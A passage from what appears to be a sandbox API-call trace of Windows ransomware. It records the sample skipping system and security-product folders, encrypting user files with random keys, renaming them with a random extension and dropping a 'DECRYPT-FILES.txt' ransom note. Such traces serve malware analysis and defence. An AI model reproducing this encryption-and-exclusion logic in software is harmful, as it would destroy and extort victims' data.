lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.835] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.835] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.835] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.835] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.835] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.835] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.835] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.836] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.836] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 94 [0076.836] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.TQRkiy8") returned 102 [0076.836] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.TQRkiy8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.tqrkiy8"), dwFlags=0x0) returned 1 [0076.836] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.836] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.837] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.837] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda2b43a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda5adf20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda5adf20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLCache", cAlternateFileName="")) returned 1 [0076.837] lstrcmpW (lpString1="CRLCache", lpString2=".") returned 1 [0076.837] lstrcmpW (lpString1="CRLCache", lpString2="..") returned 1 [0076.837] lstrcatW (in: lpString1="CRLCache", lpString2="\\" | out: lpString1="CRLCache\\") returned="CRLCache\\" [0076.837] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="CRLCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Program Files") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch=":\\Windows") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Games\\") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\All Users") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="AhnLab") returned 0x0 [0076.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.838] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0076.838] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.838] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\\\jkbimi8.tmp") returned 95 [0076.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0076.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0076.839] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.839] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\\\DECRYPT-FILES.txt") returned 101 [0076.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0076.840] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0076.841] CloseHandle (hObject=0x464) returned 1 [0076.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0076.841] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0076.841] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda2b43a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0076.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.841] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda2b43a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.841] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.841] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda5adf20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda5adf20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xdefc97c0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", cAlternateFileName="48B764~1.CRL")) returned 1 [0076.841] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="DECRYPT-FILES.txt") returned -1 [0076.841] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="autorun.inf") returned -1 [0076.841] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="boot.ini") returned -1 [0076.841] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="desktop.ini") returned -1 [0076.841] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="ntuser.dat") returned -1 [0076.841] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="iconcache.db") returned -1 [0076.841] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="bootsect.bak") returned -1 [0076.842] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="ntuser.dat.log") returned -1 [0076.842] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="thumbs.db") returned -1 [0076.842] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="Bootfont.bin") returned -1 [0076.842] lstrlenW (lpString="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 44 [0076.842] lstrcmpiW (lpString1="crl", lpString2="lnk") returned -1 [0076.842] lstrcmpiW (lpString1="crl", lpString2="exe") returned -1 [0076.842] lstrcmpiW (lpString1="crl", lpString2="sys") returned -1 [0076.842] lstrcmpiW (lpString1="crl", lpString2="dll") returned -1 [0076.842] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0076.842] lstrlenW (lpString="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 44 [0076.842] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0076.842] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpString2="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" [0076.842] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.842] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0076.842] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3f2d200 | out: lpFileSize=0x3f2d200*=933) returned 1 [0076.842] CreateFileMappingW (hFile=0x468, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x46c [0076.843] MapViewOfFile (hFileMappingObject=0x46c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0076.843] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.843] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.843] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.844] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x100) returned 1 [0076.844] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0076.844] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.845] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0076.845] CloseHandle (hObject=0x46c) returned 1 [0076.845] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.845] WriteFile (in: hFile=0x468, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d188, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d188*=0x108, lpOverlapped=0x0) returned 1 [0076.846] CloseHandle (hObject=0x0) returned 0 [0076.846] CloseHandle (hObject=0x468) returned 1 [0076.846] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.847] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.847] GetTickCount () returned 0x114bb92 [0076.847] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.847] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.847] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.847] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.848] lstrlenA (lpString="kernel32.dll") returned 12 [0076.848] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.848] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.848] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.848] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.848] lstrlenA (lpString="ADDATOMA") returned 8 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.848] lstrlenA (lpString="ADDATOMW") returned 8 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.848] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.848] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.848] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.848] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.848] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.848] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.849] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.849] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.849] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.849] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.849] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.849] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.849] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.849] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.849] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.849] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.849] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.849] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.849] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.849] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.849] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.849] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.849] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.849] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.849] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.849] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.850] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.850] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.850] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.850] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.850] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.850] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.850] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.850] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.850] lstrlenA 